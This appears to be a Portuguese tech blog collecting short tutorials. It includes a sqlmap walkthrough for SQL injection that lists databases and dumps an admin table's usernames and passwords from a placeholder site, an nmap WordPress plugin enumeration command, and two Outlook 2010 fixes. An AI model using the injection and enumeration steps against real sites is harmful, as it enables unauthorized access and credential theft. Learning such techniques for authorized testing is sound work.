Tutorial: SQL Injection para quem está iniciando
Olá a todos mais uma vez
Segue agora uma dica excelente para Pentest, esse breve tutorial vai mostrar uns passos básicos para explorar a vulnerabilidade de SQL Injection em alguns sites.
Lembre-se que o uso incorreto dessa técnica é crime, e o meu objetivo de mostrar essas informações aqui é apenas para aprendizado e testes em ambientes controlados e ou clientes.
Abra um terminal no backtrack e vamos usar a ferramenta SQLMAP
cd /pentest/database/sqlmap
Vamos executar o sqlmap
OBS: Os parametros dbs, dump, tables, columns devem ser precedidos de — (dois traços)
./sqlmap.py -u http://www.exemplo.com/viewfaculty.php?id=12 —dbs (vc precisa ter um alvo vulnerável para conseguir, para saber se o alvo é vulnerável, basta por uma ‘ no final da url e dar “enter” se retornar algum erro de banco de dados o alvo é vulnerável)
O campo “current database” vai mostrar o nome do BD vulnerável, daí basta usarmos as opções para explorarmos. Podemos listar todas as tabelas.
./sqlmap.py -u http://www.exemplo.com/viewfaculty.php?id=12 -D NOMEDOBD —tables
Devemos trocar NOMEDOBD pelo valor obtido em “current database”
O Resultado vai ser algo parecido com isso:
Daí podemos escolher uma tabela e listar as colunas
./sqlmap.py -u http://www.exemplo.com/viewfaculty.php?id=12 -D NOMEDOBD -T admin —columns
O resultado será parecido a esse:
Podemos escolher quais colunas queremos extrair informações
./sqlmap.py -u http://www.exemplo.com/viewfaculty.php?id=12 -D NOMEDOBD -T admin -C id,passwrd,u_name —dump
Entendendo as técnicas é possível extrair todos os dados que desejar do Banco vulnerável
Espero que tenham gostado
Por favor compartilhem
Dica: O que fazer quando o outlook não retorna todos os dados esperados numa pesquisa
Olá a todos, recentemente tive um problema aqui no indice do outlook 2010 que não pesquisava alguns itens, após bater cabeça um pouco, segue o que resolveu o problema aqui pra mim e gostaria de compartilhar
- Vá nas opções de indexação selecione o Outlook clique em Avançado.
- Na guia Configurações de Indexação, clique com o botão Recriar.
- Agora clique em OK.
- Espere uns instantes até que a recriação finalize. A seguir, feche e volte a abrir o Outlook, e tente realizar uma pesquisa novamente.
Tutorial: Como fazer backup e restore da lista de Autocompletar do Outlook 2010
Como exportar o cache de AutoCompletar
Para exportar o cache de AutoCompletar, siga estas etapas:
- Saia do Outlook e, em seguida, feche o Outlook Web Access ou o Outlook Web App (OWA) em todas as estações de trabalho que estão conectados à caixa de correio do usuário.
- Use MFCMAPI para importar a lista AutoCompletar. Para fazer isso, siga estes passos:
-
- Baixe o MFCMAPI de http://mfcmapi.codeplex.com.
- Execute mfcmapi.exe.
- No menu de session , clique em Logon.
- Se você for solicitado para um perfil, selecione o nome do perfil desejado e, em seguida, clique em OK.
- No painel superior, localize a linha que corresponde à sua caixa de correio e, em seguida, clique duas vezes nele.
- No painel de navegação do lado esquerdo, expanda Root Container e Início do armazenamento de informações ou IPM Sub Tree.
- Com o botão direito na pasta caixa de entrada e, em seguida, clique em Open Associated Content Table.Essa ação abre uma nova janela MFCMAPI que contém várias propriedades.
- Na coluna Subject , com o botão direito no item que tem o assunto IPM.Configuration.Autocomplete e clique em Exportar. Essa ação abre a janela Salvar em arquivo de mensagem .
- Na lista drop-down, selecione o arquivo MSG (UNICODE)e, em seguida, clique em OK.
- Selecione um local de pasta para o qual você deseja salvar a mensagem e, em seguida, clique em Salvar. Anote este local.
Como importar o cache de AutoCompletar
Para importar o cache de AutoCompletar exportado usando as etapas na seção “Como exportar o cache de AutoCompletar”, siga estas etapas:
- Saia do Outlook e, em seguida, feche o Outlook Web Access ou o Outlook Web App (OWA) em todas as estações de trabalho que estão conectados à caixa de correio do usuário.
- Use MFCMAPI para importar a lista AutoCompletar. Para fazer isso, siga estes passos:
-
- Execute mfcmapi.exe.
- No menu de session , clique em Logon.
- Se você for solicitado para um perfil, selecione o nome do perfil desejado e, em seguida, clique em OK.
- No painel superior, localize a linha que corresponde à sua caixa de correio e, em seguida, clique duas vezes nele.
- No painel de navegação do lado esquerdo, expanda Root Container e Início do armazenamento de informações ou IPM Sub Tree.
- Com o botão direito na pasta caixa de entrada e, em seguida, clique em Open Associated Content Table.Essa ação abre uma nova janela MFCMAPI que contém várias propriedades.
- Para evitar entradas duplicadas, você deve excluir a mensagem de conclusão automática existente.
Observação Antes de excluir o IPM.Configuration.Autocomplete mensagem, você deve exportar a mensagem usando as etapas na seção “Como exportar o cache de AutoCompletar”.
Para excluir a mensagem de preenchimento automático existente, siga estas etapas:
- Na coluna Subject , localize o item que tem o assunto IPM.Configuration.Autocomplete.
- Clique com o botão direito e, em seguida, clique em Excluir a mensagem. Isso abre a janela Excluir Item.
- Na lista drop-down, selecione a exclusão permanente (exclui excluído a retenção de item, se houver suporte) e, em seguida, clique em OK .
- No menu de Folder , clique em Import e, em seguida, clique em De MSG.
- Localize o arquivo. msg que você criou anteriormente na seção “Como para exportar a lista de preenchimento automático” e, em seguida, clique em OK.
- Na janela Mensagem de carga que aparece, selecione carregar a mensagem na pasta atual na lista estilo da carga e, em seguida, clique em OK.
Fonte: support.microsoft.com
Tutorial: Usando nmap para listar plugins do WordPress
Bem vindos novamente
Dessa vez vou mostrar como usar a poderosa ferramenta do nmap para listar plugins instalados em uma instalação do wordpress
"nmap --script=http-wordpress-plugins --script-args http-wordpress-plugins.root="/blog/", http-wordpress-plugins.search=500 <targets>" O Resultado será uma lista com os plugins que foram localizados na instalação do wordpress. Se gostou da dica, por favor compartilhe! Até a próxima